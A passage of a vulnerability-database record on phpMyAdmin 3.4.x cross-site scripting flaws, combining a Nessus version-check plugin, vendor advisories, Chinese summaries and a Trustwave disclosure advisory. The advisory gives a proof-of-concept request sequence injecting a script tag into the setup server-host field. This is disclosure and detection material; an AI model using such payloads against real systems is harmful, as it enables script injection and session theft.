value:\"https://www.phpmyadmin.net/security/PMASA-2010-6/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-7/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-1.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-1/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-10.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-10/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-11/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-12.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-12/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-15/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-16/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-17/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-18.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-18/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-19/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-2.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-2/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-20/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-5/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-6/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-7/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-8/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-9.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-9/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201201-01\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2010-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpMyAdmin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-3.4.9'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/phpmyadmin\", unaffected:make_list(\"ge 3.4.9\"), vulnerable:make_list(\"lt 3.4.9\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "phpmyadmin": [{"lastseen": "2019-02-04T15:52:31", "bulletinFamily": "software", "description": "## PMASA-2011-20\n\n**Announcement-ID:** PMASA-2011-20\n\n**Date:** 2011-12-21\n\n### Summary\n\nXSS in export.\n\n### Description\n\nUsing crafted url parameters, it was possible to produce XSS on the export panels in the server, database and table sections.\n\n### Severity\n\nWe consider these vulnerabilities to be non critical.\n\n### Mitigation factor\n\nThese attacks are unlikely to succeed on a victim. Moreover, all these attacks require that the user be already logged in and that a valid token be part of the request.\n\n### Affected Versions\n\nVersions 3.4.x are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 3.4.9 or newer or apply the related patches listed below.\n\n### References\n\nThanks to [Nils Juenemann](<https://twitter.com/totally_unknown>) for reporting a vulnerable url parameter.\n\nAssigned CVE ids: [CVE-2011-4780](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4780>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [bd3735ba584e7a49aee78813845245354b061f61](<https://github.com/phpmyadmin/phpmyadmin/commit/bd3735ba584e7a49aee78813845245354b061f61>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "modified": "2011-12-21T00:00:00", "published": "2011-12-21T00:00:00", "id": "PHPMYADMIN:PMASA-2011-20", "href": "https://www.phpmyadmin.net/security/PMASA-2011-20/", "title": "XSS in export.", "type": "phpmyadmin", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-04T15:52:31", "bulletinFamily": "software", "description": "## PMASA-2011-19\n\n**Announcement-ID:** PMASA-2011-19\n\n**Date:** 2011-12-21\n\n### Summary\n\nXSS in setup.\n\n### Description\n\nCrafted values entered in the setup interface can produce XSS; also, if the config directory exists and is writeable, the XSS payload can be saved to this directory.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nThe documentation warns against leaving this directory writeable; also a warning appears on the home page. Also, this XSS would target only the users who visit /setup.\n\n### Affected Versions\n\nVersions 3.4.x are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 3.4.9 or newer or apply the related patch listed below.\n\n### References\n\nThanks to Jason Leyrer of Trustwave SpiderLabs for finding this issue and to Robert Foggia (same company) for contacting us.\n\nAssigned CVE ids: [CVE-2011-4782](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4782>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [0e707906e69ce90c4852a0fce2a0fac7db86a3cd](<https://github.com/phpmyadmin/phpmyadmin/commit/0e707906e69ce90c4852a0fce2a0fac7db86a3cd>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "modified": "2011-12-21T00:00:00", "published": "2011-12-21T00:00:00", "id": "PHPMYADMIN:PMASA-2011-19", "href": "https://www.phpmyadmin.net/security/PMASA-2011-19/", "title": "XSS in setup.", "type": "phpmyadmin", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T17:56:04", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 51226\r\nCVE ID: CVE-2011-4780\r\n\r\nphpMyAdmin\u662f\u4e00\u4e2a\u7528PHP\u7f16\u5199\u7684\uff0c\u53ef\u4ee5\u901a\u8fc7web\u65b9\u5f0f\u63a7\u5236\u548c\u64cd\u4f5cMySQL\u6570\u636e\u5e93\u3002\r\n\r\nphpMyAdmin\u5728libraries/display_export.lib.php\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u591a\u4e2a\u8de8\u7ad9\u811a\u672c\u6267\u884c\u6f0f\u6d1e\uff0c\u901a\u8fc7\u7279\u5236\u7684URL\u53c2\u6570\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8fd9\u4e9b\u6f0f\u6d1e\u5728\u670d\u52a1\u5668\u3001\u6570\u636e\u5e93\u3001\u8868\u683c\u7684\u5bfc\u51fa\u9762\u677f\u4e0a\u9020\u6210XSS\uff0c\u53ef\u5728\u53d7\u5f71\u54cd\u7ad9\u70b9\u7684\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u4efb\u610f\u811a\u672c\u4ee3\u7801\uff0c\u7a83\u53d6Cookie\u8eab\u4efd\u9a8c\u8bc1\u51ed\u8bc1\u3002\n0\nphpMyAdmin 3.4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nphpMyAdmin\r\n----------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.phpmyadmin.net/home_page/security/", "modified": "2012-01-04T00:00:00", "published": "2012-01-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-30007", "id": "SSV:30007", "type": "seebug", "title": "phpMyAdmin 3.4.9\u4e4b\u524d\u7248\u672c\u591a\u4e2a\u8de8\u7ad9\u811a\u672c\u6267\u884c\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T18:01:44", "bulletinFamily": "exploit", "description": "Bugtraq ID: 51166\r\nCVE ID\uff1aCVE-2011-4782\r\n\r\nphpMyAdmin\u662f\u4e00\u6b3e\u57fa\u4e8ePHP\u7684MySQL\u7ba1\u7406\u7a0b\u5e8f\u3002\r\n\r\n\u90e8\u5206\u8f93\u5165\u5230setup\u63a5\u53e3\u7684\u7279\u5236\u503c\u53ef\u89e6\u53d1XSS\uff0c\u800c\u4e14\u5982\u679c\u914d\u7f6e\u76ee\u5f55\u5b58\u5728\u5e76\u79d1\u534f\uff0cXSS\u8d1f\u8f7d\u53ef\u4fdd\u5b58\u5230\u6b64\u76ee\u5f55\u3002\n0\nphpMyAdmin phpMyAdmin 3.4.8\r\nphpMyAdmin phpMyAdmin 3.4.6\r\nphpMyAdmin phpMyAdmin 3.4.5\r\nphpMyAdmin phpMyAdmin 3.4.3\r\nphpMyAdmin phpMyAdmin 3.4.5\r\nphpMyAdmin phpMyAdmin 3.4.4\r\nphpMyAdmin phpMyAdmin 3.4.3.2\r\nphpMyAdmin phpMyAdmin 3.4.3.1\r\nphpMyAdmin phpMyAdmin 3.4.1\r\nphpMyAdmin phpMyAdmin 3.4.0-beta1\r\nphpMyAdmin phpMyAdmin 3.4.0\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\r\nphpMyAdmin 3.4.9\u5df2\u7ecf\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.phpmyadmin.net/", "modified": "2011-12-24T00:00:00", "published": "2011-12-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26100", "id": "SSV:26100", "title": "phpMyAdmin '$host'\u53d8\u91cfHTML\u6ce8\u5165\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": ""}], "packetstorm": [{"lastseen": "2016-12-05T22:20:15", "bulletinFamily": "exploit", "description": "", "modified": "2011-12-22T00:00:00", "published": "2011-12-22T00:00:00", "href": "https://packetstormsecurity.com/files/108110/phpMyAdmin-3.4.8-Cross-Site-Scripting.html", "id": "PACKETSTORM:108110", "type": "packetstorm", "title": "phpMyAdmin 3.4.8 Cross Site Scripting", "sourceData": "`Trustwave's SpiderLabs Security Advisory TWSL2011-019: \nCross-Site Scripting Vulnerability in phpMyAdmin \n \nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2011-019.txt \n \nPublished: 12/22/11 \nVersion: 1.0 \n \nVendor: phpMyAdmin (http://www.phpmyadmin.net/) \nProduct: phpMyAdmin \nVersion affected: 3.4.8 and prior \n \nProduct description: \nAn open source tool developed in PHP to manage and administer MySQL \ndatabases remotely. The web browser interface allows creating, modifying \nor deleting databases, tables, fields or rows, executing SQL statements, \nand other database functions. \n \nCredit: Jason Leyrer of Trustwave SpiderLabs \n \nFinding 1: Cross-Site Scripting (XSS) Vulnerability in Setup Interface \nCVE: CVE-2011-4782 \n \nAffected versions of phpMyAdmin do not sanitize user-supplied server names \nbefore displaying them in its Setup Overview. This allows remote attackers \nto execute arbitrary web scripts or HTML via a crafted request. \n \nphpMyAdmin allows users to add database servers via its Setup interface. \nSince phpMyAdmin doesn't do any input validation on server hostnames when \nthey are entered, it is up to whatever displays these names throughout the \napplication to use htmlspecialchars() (or similar) to sanitize them. \n \nphpMyAdmin uses a function called perform_config_checks() to perform a \nseries of compatibility, security and consistency checks on application \nconfiguration options. If it finds settings that are contrary to best \npractices, perform_config_checks() generates messages to be displayed to \nusers at the top of the Setup Overview page. The messages generated for \nsome of these configuration options ($cfg['Servers'][$i]['ssl'], \n$cfg['Servers'][$i]['extension'], $cfg['Servers'][$i]['auth_type'], \n$cfg['Servers'][$i]['AllowRoot'], and \n$cfg['Servers'][$i]['AllowNoPassword']) are constructed using user-supplied \nhostnames without any sanitization taking place. This can lead to web \nscript being executed when the Setup Overview page is loaded. \n \nThe following is a Proof of Concept (PoC): \n \n1. Request the Setup interface's index page in order to obtain the \nphpMyAdmin cookie and the value of 'token', which appears in the response \nbody: \n \nRequest \n------- \nGET /phpmyadmin/setup/index.php HTTP/1.1 \n \nResponse \n-------- \nHTTP/1.1 200 OK \nDate: Thu, 01 Dec 2011 16:42:17 GMT \nServer: Apache/2.2.20 (Ubuntu) \nX-Powered-By: PHP/5.3.6-13ubuntu3.2 \nSet-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly \nExpires: Thu, 01 Dec 2011 16:42:17 GMT \nCache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 \nLast-Modified: Thu, 01 Dec 2011 16:42:17 GMT \nSet-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly \nX-Frame-Options: SAMEORIGIN \nX-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net \nPragma: no-cache \nVary: Accept-Encoding \nContent-Length: 7722 \nContent-Type: text/html; charset=utf-8 \n \n---snip--- \n \n<input type=\"hidden\" name=\"token\" value=\"5acce3a965bbe9d42ce50bdf3d491ed9\" /> \n \n \n2. Input javascript (%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E) to \nthe 'Servers-0-host' input field in Add New Server mode, as shown in the \npostdata of the following request: \n \n \nRequest \n------- \nPOST /phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server HTTP/1.1 \nHost: A.B.C.D \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-us,en;q=0.5 \nAccept-Encoding: gzip, deflate \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \nProxy-Connection: keep-alive \nReferer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server \nCookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 1430 \n \ntab_hash=&check_page_refresh=1&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&Servers-0-verbose=&Servers-0-host=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&Servers-0-port=&Servers-0-socket=&Servers-0-connect_type=tcp&Servers-0-extension=mysqli&submit_save=Save&Servers-0-auth_type=cookie&Servers-0-user=root&Servers-0-password=&Servers-0-auth_swekey_config=&Servers-0-auth_http_realm=&Servers-0-SignonSession=&Servers-0-SignonURL=&Servers-0-LogoutURL=&Servers-0-only_db=&Servers-0-only_db-userprefs-allow=on&Servers-0-hide_db=&Servers-0-hide_db-userprefs-allow=on&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowDatabasesCommand=SHOW+DATABASES&Servers-0-pmadb=&Servers-0-controluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&Servers-0-bookmarktable=&Servers-0-relation=&Servers-0-userconfig=&Servers-0-table_info=&Servers-0-column_info=&Servers-0-history=&Servers-0-tracking=&Ser \nvers-0-table_coords=&Servers-0-pdf_pages=&Servers-0-designer_coords=&Servers-0-tracking_default_statements=CREATE+TABLE%2CALTER+TABLE%2CDROP+TABLE%2CRENAME+TABLE%2CCREATE+INDEX%2CDROP+INDEX%2CINSERT%2CUPDATE%2CDELETE%2CTRUNCATE%2CREPLACE%2CCREATE+VIEW%2CALTER+VIEW%2CDROP+VIEW%2CCREATE+DATABASE%2CALTER+DATABASE%2CDROP+DATABASE&Servers-0-tracking_add_drop_view=on&Servers-0-tracking_add_drop_table=on&Servers-0-tracking_add_drop_database=on \n \n \n3. View unsanitized script tags on the Setup overview page: \n \nRequest \n------- \nGET /phpmyadmin/setup/index.php HTTP/1.1 \nHost: A.B.C.D \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-us,en;q=0.5 \nAccept-Encoding: gzip, deflate \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \nProxy-Connection: keep-alive \nReferer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server \nCookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en \n \nResponse \n-------- \nHTTP/1.1 200 OK \nDate: Thu, 01 Dec 2011 16:44:18 GMT \nServer: Apache/2.2.20 (Ubuntu) \nX-Powered-By: PHP/5.3.6-13ubuntu3.2 \nExpires: Thu, 01 Dec 2011 16:44:18 GMT \nCache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 \nLast-Modified: Thu, 01 Dec 2011 16:44:18 GMT \nX-Frame-Options: SAMEORIGIN \nX-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net \nPragma: no-cache \nVary: Accept-Encoding \nContent-Length: 7852 \nContent-Type: text/html; charset=utf-8 \n \n---snip--- \n \n<div class=\"notice\" id=\"Servers/1/ssl\"><h4>Use SSL (<script>alert('XSS');</script>)</h4>You should use SSL connections if your web server supports it.</div> \n \nPlease note that valid database credentials are not required to exploit \nthis vulnerability. \n \n \nRemediation Steps: \nphpMyAdmin version 3.4.9 includes a fix for this security issue. Apply \nthe appropriate vendor updates for this product or upgrade to a current and \nsecure version of PHPMyAdmin. \n \n \nRevision History: \n12/7/11 - Vulnerability disclosed \n12/21/11 - Patch released by vendor \n12/22/11 - Advisory published \n \n \nAbout Trustwave: \nTrustwave is the leading provider of on-demand and subscription-based \ninformation security and payment card industry compliance management \nsolutions to businesses and government entities throughout the world. For \norganizations faced with today's challenging data security and compliance \nenvironment, Trustwave provides a unique approach with comprehensive \nsolutions that include its flagship TrustKeeper compliance management \nsoftware and other proprietary security solutions. Trustwave has helped \nthousands of organizations--ranging from Fortune 500 businesses and large \nfinancial institutions to small and medium-sized retailers--manage \ncompliance and secure their network infrastructure, data communications and \ncritical information assets. Trustwave is headquartered in Chicago with \noffices throughout North America, South America, Europe, Africa, China and \nAustralia. For more information, visit https://www.trustwave.com \n \nAbout Trustwave's SpiderLabs: \nSpiderLabs(R) is the advanced security team at Trustwave focused on \napplication security, incident response, penetration testing, physical \nsecurity and security research. The team has performed over a thousand \nincident investigations, thousands of penetration tests and hundreds of \napplication security tests globally. In addition, the SpiderLabs Research \nteam provides intelligence through bleeding-edge research and proof of \nconcept tool development to enhance Trustwave's products and services. \nhttps://www.trustwave.com/spiderlabs \n \nDisclaimer: \nThe information provided in this advisory is provided \"as is\" without \nwarranty of any kind. Trustwave disclaims all warranties, either express or \nimplied, including the warranties of merchantability and fitness for a \nparticular purpose. In no event shall Trustwave or its suppliers be liable \nfor any damages whatsoever including direct, indirect, incidental, \nconsequential, loss of business profits or special damages, even if \nTrustwave or its suppliers have been advised of the possibility of such \ndamages. Some states do not allow the exclusion or limitation of liability \nfor consequential or incidental damages so the foregoing limitation may not \napply. \n \nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108110/TWSL2011-019.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "description": "Trustwave&#39;s SpiderLabs Security Advisory TWSL2011-019:\r\nCross-Site Scripting Vulnerability in phpMyAdmin\r\n\r\nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2011-019.txt\r\n\r\nPublished: 12/22/11\r\nVersion: 1.0\r\n\r\nVendor: phpMyAdmin &#40;http://www.phpmyadmin.net/&#41;\r\nProduct: phpMyAdmin\r\nVersion affected: 3.4.8 and prior\r\n\r\nProduct description:\r\nAn open source tool developed in PHP to manage and administer MySQL\r\ndatabases remotely. The web browser interface allows creating, modifying\r\nor deleting databases, tables, fields or rows, executing SQL statements,\r\nand other database functions.\r\n\r\nCredit: Jason Leyrer of Trustwave SpiderLabs\r\n\r\nFinding 1: Cross-Site Scripting &#40;XSS&#41; Vulnerability in Setup Interface\r\nCVE: CVE-2011-4782\r\n\r\nAffected versions of phpMyAdmin do not sanitize user-supplied server names\r\nbefore displaying them in its Setup Overview. This allows remote attackers\r\nto execute arbitrary web scripts or HTML via a crafted request.\r\n\r\nphpMyAdmin allows users to add database servers via its Setup interface.\r\nSince phpMyAdmin doesn&#39;t do any input validation on server hostnames when\r\nthey are entered, it is up to whatever displays these names throughout the\r\napplication to use htmlspecialchars&#40;&#41; &#40;or similar&#41; to sanitize them.\r\n\r\nphpMyAdmin uses a function called perform_config_checks&#40;&#41; to perform a\r\nseries of compatibility, security and consistency checks on application\r\nconfiguration options. If it finds settings that are contrary to best\r\npractices, perform_config_checks&#40;&#41; generates messages to be displayed to\r\nusers at the top of the Setup Overview page. The messages generated for\r\nsome of these configuration options &#40;$cfg[&#39;Servers&#39;][$i][&#39;ssl&#39;],\r\n$cfg[&#39;Servers&#39;][$i][&#39;extension&#39;], $cfg[&#39;Servers&#39;][$i][&#39;auth_type&#39;],\r\n$cfg[&#39;Servers&#39;][$i][&#39;AllowRoot&#39;], and\r\n$cfg[&#39;Servers&#39;][$i][&#39;AllowNoPassword&#39;]&#41; are constructed using user-supplied\r\nhostnames without any sanitization taking place. This can lead to web\r\nscript being executed when the Setup Overview page is loaded.\r\n\r\nThe following is a Proof of Concept &#40;PoC&#41;:\r\n\r\n1. Request the Setup interface&#39;s index page in order to obtain the\r\nphpMyAdmin cookie and the value of &#39;token&#39;, which appears in the response\r\nbody:\r\n\r\nRequest\r\n-------\r\nGET /phpmyadmin/setup/index.php HTTP/1.1\r\n\r\nResponse\r\n--------\r\nHTTP/1.1 200 OK\r\nDate: Thu, 01 Dec 2011 16:42:17 GMT\r\nServer: Apache/2.2.20 &#40;Ubuntu&#41;\r\nX-Powered-By: PHP/5.3.6-13ubuntu3.2\r\nSet-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly\r\nExpires: Thu, 01 Dec 2011 16:42:17 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0\r\nLast-Modified: Thu, 01 Dec 2011 16:42:17 GMT\r\nSet-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly\r\nX-Frame-Options: SAMEORIGIN\r\nX-Content-Security-Policy: allow &#39;self&#39;; options inline-script eval-script; frame-ancestors &#39;self&#39;; img-src &#39;self&#39; data:; script-src &#39;self&#39; www.phpmyadmin.net\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Length: 7722\r\nContent-Type: text/html; charset=utf-8\r\n\r\n---snip---\r\n\r\n&lt;input type=&quot;hidden&quot; name=&quot;token&quot; value=&quot;5acce3a965bbe9d42ce50bdf3d491ed9&quot; /&gt;\r\n\r\n\r\n2. Input javascript &#40;&#37;3Cscript&#37;3Ealert&#37;28&#37;27XSS&#37;27&#37;29&#37;3B&#37;3C&#37;2Fscript&#37;3E&#41; to\r\nthe &#39;Servers-0-host&#39; input field in Add New Server mode, as shown in the\r\npostdata of the following request:\r\n\r\n\r\nRequest\r\n-------\r\nPOST /phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&amp;tab_hash=&amp;check_page_refresh=1&amp;lang=en&amp;collation_connection=utf8_general_ci&amp;token=5acce3a965bbe9d42ce50bdf3d491ed9&amp;page=servers&amp;mode=add&amp;submit=New+server HTTP/1.1\r\nHost: A.B.C.D\r\nUser-Agent: Mozilla/5.0 &#40;Macintosh; Intel Mac OS X 10.6; rv:8.0.1&#41; Gecko/20100101 Firefox/8.0.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nProxy-Connection: keep-alive\r\nReferer: 